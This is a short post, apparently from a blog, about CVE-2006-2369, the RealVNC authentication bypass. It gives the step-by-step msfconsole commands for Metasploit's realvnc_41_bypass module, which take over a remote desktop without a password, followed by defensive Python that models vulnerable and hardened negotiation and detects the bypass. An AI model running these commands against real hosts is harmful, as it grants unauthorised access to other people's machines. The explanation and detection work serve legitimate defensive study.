Metasploit's RealVNC authentication bypass module for CVE-2006-2369 is pretty fun because it's one of those that is way too easy. If a victim is running a RealVNC server earlier than 4.1.2, or a LibVNCServer-based VNC server earlier than 0.8.2, a customized VNC client can send 'Type 1 - None' as the authentication type and completely bypass authentication. Metasploit does this for you.
This vulnerability was discovered by Steve Wiseman by accident while coding his own VNC software, so that's a fun fact. It is of course a very old vuln, but it still exists out there, unfortunately. Here are the commands to exploit it using msfconsole:
use auxiliary/admin/vnc/realvnc_41_bypass
show options
set autovnc true
set rhost <target-victim>
run
At this point, Metasploit should automatically launch a VNC client and remote to the host while bypassing authentication. Fun stuff.
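The server-side decision behind the bypass described at the top of the post, modelled as an added example (this is not the post's code, Metasploit's module, or RealVNC's source): the RFB 3.8 security handshake is reduced to its two relevant messages, the server's offered type list and the client's one-byte selection. A vulnerable negotiation that acts on whatever type the client names sits next to a hardened one that refuses any type it did not offer, and a small detector parses constructed handshake bytes the way a sensor watching the VNC port could, flagging a session where the client picked a type the server never offered and the server still answered SecurityResult OK. The sample bytes are constructed for the example.

```python
"""RFB 3.8 security-type negotiation: vulnerable vs. hardened, plus a detector.

Added example, not the original post's code and not RealVNC or LibVNCServer
source. It models the server decision that CVE-2006-2369 got wrong and parses
constructed handshake bytes to show how the pattern can be detected.
"""
import struct

# RFB 3.8 security type numbers (RFC 6143, section 7.1.2)
SEC_INVALID = 0   # server refuses the connection
SEC_NONE = 1      # no authentication at all
SEC_VNCAUTH = 2   # challenge/response on the password


def server_security_offer(offered):
    """Bytes the server sends after the version exchange: u8 count, then u8 types."""
    return bytes([len(offered)]) + bytes(offered)


def negotiate_vulnerable(offered, client_choice):
    """Pre-fix behaviour as the post describes it: the server acts on whatever
    type the client selects, without checking it against `offered`."""
    if client_choice in (SEC_NONE, SEC_VNCAUTH):
        return client_choice      # None goes straight to SecurityResult OK
    return SEC_INVALID


def negotiate_hardened(offered, client_choice):
    """Fixed behaviour: a selection the server did not offer is refused."""
    if client_choice not in offered:
        return SEC_INVALID
    return client_choice


def parse_security_handshake(server_bytes, client_bytes):
    """Split the server's offer (u8 count + u8 types) and the client's u8 pick."""
    count = server_bytes[0]
    offered = list(server_bytes[1:1 + count])
    if len(offered) != count or len(client_bytes) < 1:
        raise ValueError("truncated security handshake")
    return offered, client_bytes[0]


def is_bypass_attempt(server_bytes, client_bytes):
    """Detection: the client selected a security type the server never offered."""
    offered, choice = parse_security_handshake(server_bytes, client_bytes)
    return choice not in offered


def is_confirmed_bypass(server_bytes, client_bytes, result_bytes):
    """Attempt plus a SecurityResult of 0 (OK) from the server: the session
    proceeded without authentication."""
    (status,) = struct.unpack(">I", result_bytes[:4])
    return is_bypass_attempt(server_bytes, client_bytes) and status == 0


# Constructed sample exchange: the server offers only VNC Authentication, the
# client answers with None, and a vulnerable server replies SecurityResult OK.
SAMPLE_OFFER = server_security_offer([SEC_VNCAUTH])   # b"\x01\x02"
SAMPLE_CLIENT_PICK = bytes([SEC_NONE])                 # b"\x01"
SAMPLE_RESULT_OK = struct.pack(">I", 0)                # b"\x00\x00\x00\x00"

if __name__ == "__main__":
    print("vulnerable server proceeds with type",
          negotiate_vulnerable([SEC_VNCAUTH], SEC_NONE))
    print("hardened server proceeds with type",
          negotiate_hardened([SEC_VNCAUTH], SEC_NONE))
    print("sensor flags confirmed bypass:",
          is_confirmed_bypass(SAMPLE_OFFER, SAMPLE_CLIENT_PICK, SAMPLE_RESULT_OK))
```

The detector keys on the mismatch between offer and selection rather than on the None type itself, since a server that legitimately offers None (type 1 in its list) is a configuration question, not this bug; only a None selection the server never advertised, followed by a SecurityResult of 0, means an unpatched server let the session through.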
Links:
http://www.tenable.com/plugins/index.php?view=single&id=21564
https://vulners.com/metasploit/MSF:AUXILIARY/ADMIN/VNC/REALVNC_41_BYPASS
http://www.intelliadmin.com/index.php/2006/05/security-flaw-in-realvnc-411/